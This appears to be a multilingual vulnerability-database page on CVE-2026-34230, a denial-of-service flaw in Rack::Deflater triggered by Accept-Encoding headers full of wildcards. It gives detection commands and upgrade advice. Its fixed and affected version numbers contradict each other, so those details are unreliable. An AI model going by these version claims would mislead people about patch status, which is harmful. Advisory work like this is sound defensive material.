प्लेटफ़ॉर्म
ruby
घटक
rack
में ठीक किया गया
2.2.24
3.0.1
3.2.1
2.2.23
CVE-2026-34230 describes a denial-of-service (DoS) vulnerability within the Ruby Rack library, specifically impacting the Rack::Deflater middleware. This flaw arises from inefficient processing of Accept-Encoding headers, leading to quadratic time complexity when wildcard entries are present. Applications utilizing Rack::Deflater are susceptible, and upgrading to version 2.2.23 resolves the issue.
An attacker can exploit this vulnerability by sending a single HTTP request containing a specially crafted Accept-Encoding header with numerous wildcard (*) entries. The Rack::Utils.selectbestencoding method, used by Rack::Deflater to determine the response encoding, then expands these wildcards, resulting in a significant increase in CPU consumption. This disproportionate CPU load can effectively overwhelm the server, leading to a denial of service, preventing legitimate users from accessing the application. The impact is particularly severe for applications handling high volumes of requests or those deployed on resource-constrained environments.
CVE-2026-34230 was publicly disclosed on April 2, 2026. There is no indication of active exploitation at this time. The vulnerability is not currently listed on the CISA KEV catalog. Public proof-of-concept (PoC) code is not widely available, but the vulnerability's nature makes it relatively straightforward to reproduce.
Ruby applications that rely on the Rack library and utilize the Rack::Deflater middleware are at risk. This includes web applications built with frameworks like Ruby on Rails, Sinatra, and Padrino. Shared hosting environments where Rack is a dependency are also potentially vulnerable.
• ruby / server:
ps aux | grep rack• ruby / server:
journalctl -u rack | grep "select_best_encoding"• generic web:
curl -I <target_url> | grep Accept-Encodingdisclosure
एक्सप्लॉइट स्थिति
EPSS
0.05% (16% शतमक)
CISA SSVC
CVSS वेक्टर
The primary mitigation for CVE-2026-34230 is to upgrade the Rack library to version 2.2.23 or later. If an immediate upgrade is not feasible due to compatibility concerns or breaking changes, consider implementing a temporary workaround by filtering or limiting the number of wildcard entries in the Accept-Encoding header on the web server or reverse proxy. Web Application Firewalls (WAFs) can also be configured to block requests with excessively long or complex Accept-Encoding headers. After upgrading, confirm the fix by sending a request with a crafted Accept-Encoding header containing multiple wildcards and verifying that CPU usage remains within acceptable limits.
Actualice la gema Rack a la versión 2.2.23, 3.1.21 o 3.2.6, o superior. Esto corrige la vulnerabilidad de denegación de servicio causada por la complejidad cuadrática en el procesamiento de encabezados Accept-Encoding. Ejecute `gem update rack` para actualizar.
भेद्यता विश्लेषण और गंभीर अलर्ट सीधे आपके ईमेल में।
CVE-2026-34230 is a denial-of-service vulnerability in the Ruby Rack library's Deflater middleware. A crafted Accept-Encoding header can cause excessive CPU usage, potentially leading to a server outage.
You are affected if your Ruby application uses Rack version 2.2.9 or earlier and utilizes the Rack::Deflater middleware for compression.
Upgrade the Rack library to version 2.2.23 or later. If immediate upgrade is not possible, consider temporary workarounds like filtering Accept-Encoding headers.
There is currently no evidence of active exploitation of CVE-2026-34230, but the vulnerability's nature makes it relatively easy to reproduce.
Refer to the official Ruby security advisories and the Rack project's release notes for detailed information and updates regarding CVE-2026-34230.
अपनी डिपेंडेंसी फ़ाइल अपलोड करें और तुरंत जानें कि यह CVE और अन्य आपको प्रभावित करती हैं या नहीं।
अपनी Gemfile.lock फ़ाइल अपलोड करें और तुरंत जानें कि आप प्रभावित हैं या नहीं।